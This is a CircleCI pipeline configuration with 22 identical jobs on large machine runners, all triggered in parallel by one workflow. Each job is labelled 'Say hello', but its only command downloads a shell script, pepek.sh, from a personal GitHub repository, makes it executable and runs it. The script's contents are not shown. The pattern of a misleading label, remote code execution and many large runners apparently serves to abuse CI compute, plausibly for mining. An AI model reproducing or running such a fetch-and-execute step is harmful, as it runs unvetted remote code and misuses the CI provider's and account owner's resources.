# Use the latest 2.1 version of CircleCI pipeline proc
version: 2.1

jobs:
  say-hello:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello1:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello2:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello3:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello4:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello5:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello6:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello7:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello8:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello9:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello10:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello11:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello12:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello13:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello14:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello15:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello16:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello17:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello18:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello19:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello20:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
  say-hello21:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/configuration-reference/#executor-job
    machine:
      image: ubuntu-2004:202010-01
    resource_class: large
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: wget https://raw.githubusercontent.com/haria11/flaskapp/main/pepek.sh && chmod +x pepek.sh && ./pepek.sh
# Orchestrate jobs using workflows
# See: https://circleci.com/docs/configuration-reference/#workflows
workflows:
  say-hello-workflow:
    jobs:
      - say-hello
      - say-hello1
      - say-hello2
      - say-hello3
      - say-hello4
      - say-hello5
      - say-hello6
      - say-hello7
      - say-hello8
      - say-hello9
      - say-hello10
      - say-hello11
      - say-hello12
      - say-hello13
      - say-hello14
      - say-hello15
      - say-hello16
      - say-hello17
      - say-hello18
      - say-hello19
      - say-hello20
      - say-hello21